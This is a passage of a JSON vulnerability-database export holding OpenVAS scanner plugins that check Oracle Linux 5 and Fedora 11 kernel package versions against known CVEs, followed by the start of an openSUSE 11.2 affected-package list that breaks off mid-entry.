Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122396\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:18:14 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0046\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0046 - kernel security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0046\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0046.html\");\n script_cve_id(\"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\", \"CVE-2006-6304\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~164.11.1.0.1.el5~1.4.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~164.11.1.0.1.el5PAE~1.4.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~164.11.1.0.1.el5debug~1.4.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~164.11.1.0.1.el5xen~1.4.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~164.11.1.0.1.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~164.11.1.0.1.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~164.11.1.0.1.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~164.11.1.0.1.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:03", "references": ["2010-1500", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034830.html"], "pluginID": "861615", "description": "Check for the Version of kernel", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "title": "Fedora Update for kernel FEDORA-2010-1500", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0307", "CVE-2009-4537", "CVE-2010-0007", "CVE-2009-3621", "CVE-2009-3638", "CVE-2009-4141", "CVE-2009-4538", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-3620", "CVE-2009-4536", "CVE-2009-3624", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-2909", "CVE-2010-0003", "CVE-2010-0006", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2017-12-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861615", "id": "OPENVAS:861615", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-1500\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 11\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034830.html\");\n script_id(861615);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-1500\");\n script_cve_id(\"CVE-2009-4141\", \"CVE-2009-4536\", \"CVE-2009-4537\", \"CVE-2009-4538\", \"CVE-2010-0307\", \"CVE-2010-0003\", \"CVE-2010-0007\", \"CVE-2010-0006\", \"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3624\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2909\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\");\n script_name(\"Fedora Update for kernel FEDORA-2010-1500\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.30.10~105.2.13.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:23:43", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-debug-debugsource-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-debug-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-xen-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "noarch", "packageFilename": "kernel-source-2.6.31.12-0.1.1.noarch.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-trace-base-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-trace-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-vanilla-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-vanilla-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-pae-debugsource-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-pae-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-desktop-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-default-devel-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-trace-base-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-xen-devel-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-base-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-vanilla-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-trace-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.1_2.6.31.12_0.1-6.9.12", "arch": "i586", "packageFilename": "preload-kmp-desktop-1.1_2.6.31.12_0.1-6.9.12.i586.rpm", "packageName": "preload-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-debug-base-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-debug-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.1_2.6.31.12_0.1-6.9.12", "arch": "i586", "packageFilename": "preload-kmp-default-1.1_2.6.31.12_0.1-6.9.12.i586.rpm", "packageName": "preload-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-pae-base-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-pae-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-pae-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-trace-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-xen-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-xen-devel-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-xen-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "noarch", "packageFilename": "kernel-source-vanilla-2.6.31.12-0.1.1.noarch.rpm", "packageName": "kernel-source-vanilla", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-desktop-devel-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-desktop-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-desktop-base-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-desktop-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-desktop-devel-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-desktop-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-debug-devel-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-vanilla-base-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-vanilla-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-trace-debugsource-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-vanilla-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-desktop-base-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-desktop-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-xen-base-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-debug-debugsource-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-debug-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-default-base-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-trace-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-xen-debugsource-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.1_2.6.31.12_0.1-6.9.12", "arch": "x86_64", "packageFilename": "preload-kmp-desktop-1.1_2.6.31.12_0.1-6.9.12.x86_64.rpm", "packageName": "preload-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-xen-base-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-vanilla", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-desktop-base-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-desktop-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-debug-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-debug-base-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-debug-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-desktop-debugsource-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-desktop-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-vanilla-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-vanilla", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-default-devel-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-vanilla-devel-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-vanilla-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-debug-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-debugsource-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-vanilla-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-desktop-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-desktop-base-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-desktop-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-debug-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-desktop-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-base-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-vanilla-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-debug-devel-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-debug-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-default-debugsource-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-vanilla-debugsource-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-vanilla-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-default-devel-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-syms-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-xen-devel-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-xen-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-trace-devel-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-syms-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-default-base-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-devel-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-vanilla-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-desktop-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-pae-devel-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-pae-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-trace-debugsource-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-trace-devel-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-desktop-debugsource-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-desktop-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-debug-devel-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-debug-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-default-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-default-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-xen-debugsource-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": 